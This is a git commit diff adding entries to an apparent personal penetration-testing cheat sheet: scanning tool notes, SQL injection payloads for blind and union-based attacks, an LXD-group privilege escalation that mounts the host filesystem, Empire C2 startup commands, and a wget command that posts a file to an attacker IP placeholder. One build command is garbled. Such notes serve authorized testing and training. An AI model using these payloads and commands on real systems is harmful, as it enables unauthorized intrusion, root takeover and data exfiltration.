added stuff

2021-09-24 00:54:18 +02:00 · 2021-09-24 00:54:18 +02:00 · 3957f28be8
parent 7cbcb593a0
commit 3957f28be8
12 changed files with 97 additions and 6 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -31,3 +31,12 @@
 [submodule "exploit/web/php/Chankro"]
 	path = exploit/web/php/Chankro
 	url = https://github.com/TarlogicSecurity/Chankro.git
+[submodule "enumeration/enumeration"]
+	path = enumeration/enumeration
+	url = https://github.com/digininja/CeWL.git
+[submodule "enumeration/CeWL"]
+	path = enumeration/CeWL
+	url = https://github.com/digininja/CeWL.git
+[submodule "enumeration/RustScan"]
+	path = enumeration/RustScan
+	url = https://github.com/RustScan/RustScan.git
--- a/enumeration/CeWL
+++ b/enumeration/CeWL
@ -0,0 +1 @@
+Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d
--- a/enumeration/RustScan
+++ b/enumeration/RustScan
@ -0,0 +1 @@
+Subproject commit a444ab66e1d2ce17a3154b7cbe21a221bad97e30
--- a/enumeration/docs/cewl.md
+++ b/enumeration/docs/cewl.md
@ -0,0 +1,4 @@
+# Cewl
+
+* Wordlist generator from website
+* [CeWl repo](https://github.com/digininja/CeWL.git)
--- a/enumeration/docs/rustscan.md
+++ b/enumeration/docs/rustscan.md
@ -0,0 +1,14 @@
+# Rustscan
+
+* [Rustscan repo](https://github.com/RustScan/RustScan)
+
+* Config at `$HOME/.rustscan_scripts.toml`
+
+## Usage
+```sh
+rustscan -r ports -a  <Target-ip> -- <nmap cmds>
+```
+* Using nmap parameters
+```sh
+rustscan -a 127.0.0.1 -- -A -sC
+```
--- a/enumeration/enumeration
+++ b/enumeration/enumeration
@ -0,0 +1 @@
+Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d
--- a/exfiltration/linux/wget.md
+++ b/exfiltration/linux/wget.md
@ -0,0 +1,7 @@
+# POST via wget
+
+## Usage
+Send file via wget
+```
+sudo wget --post-file=<fileToExfiltrate> http://<attacker-IP>:<attacker-Port>
+```
--- a/exploit/sqli/sqli.md
+++ b/exploit/sqli/sqli.md
@ -34,12 +34,22 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+

 ### Blind injection // Guessing characters
 ```sh
-http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
+http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
+```
+```sh
+http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
 ```
 * Function substr(string, start, length)
 * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` 

 ### Union based
+* _First method__ check by order until error occurs
+```sql
+' order by 1 -- -
+' order by 2 -- -
+' order by 3 -- -
+```
+* __Second method__ fuzzing NULL values, followed by fuzzing data types
 * Check number of cols
 ```sql
 ' UNION SELECT NULL--
@ -78,6 +88,9 @@ id=(SELECT banner FROM v$version) # oracle
 ```
 * sqlite specific
 ```sql
+' UNION SELECT sql, sql FROM sqlite_master -- -
+```
+```sql
 (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
 (SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
 ```
--- a/misc/level3_hypervisor/docker_sec/dive
+++ b/misc/level3_hypervisor/docker_sec/dive
--- a/misc/level3_hypervisor/docker_sec/docker.md
+++ b/misc/level3_hypervisor/docker_sec/docker.md
--- a/misc/level3_hypervisor/lxc.md
+++ b/misc/level3_hypervisor/lxc.md
@ -0,0 +1,32 @@
+# LXC 
+
+## Privilege Escalation
+
+### Member of lxd Group
+
+* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/)
+* User has to be in `lxd` group, not necessarily `sudo`.
+
+#### Usage
+* Clone and build 
+```sh
+git clone https://github.com/saghul/lxd-alpine-builder.git
+cd lxd-alpine-builde && sudo && ./build alpine
+```
+* Upload to target
+* Import alpine image
+```sh
+lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage
+```
+* Prepare image
+```sh
+lxc image list
+lxc init myimage ignite -c security.privileged=true
+lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
+lxc start ignite
+lxc exec ignite /bin/sh
+```
+* Host `/` is mounted at `/mnt/root` inside the container
+* `root` directory is at `/mnt/root/root`
+
+
--- a/post_exploitation/docs/empire.md
+++ b/post_exploitation/docs/empire.md
@ -1,11 +1,20 @@
 # Empire C2

-## Parts
-* Listeners
-* Stagers,  payloads generated, for example a reverse, delivery mechanism for agents
-* Agents 
-* Modules use through agents 
+* [Empire Repo](https://github.com/BC-SECURITY/Empire.git)

+## Start Client and Server
+```sh
+poetry run python empire --server --rest --notifications
+poetry run python empire.py client
+```
+
+## Parts
+* __Listeners__ receive connections from stagers
+* __Stagers__ payloads generated, for example a reverse, delivery mechanism for agents
+* __Agents__ remote on target device tasks
+* __Modules__ use modularized payload  on agents
+* __Credentials__
+* __Report__ information on devices

 * Results are stored in a DB
				`@ -0,0 +1 @@`
				`Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d`
				`@ -0,0 +1 @@`
				`Subproject commit a444ab66e1d2ce17a3154b7cbe21a221bad97e30`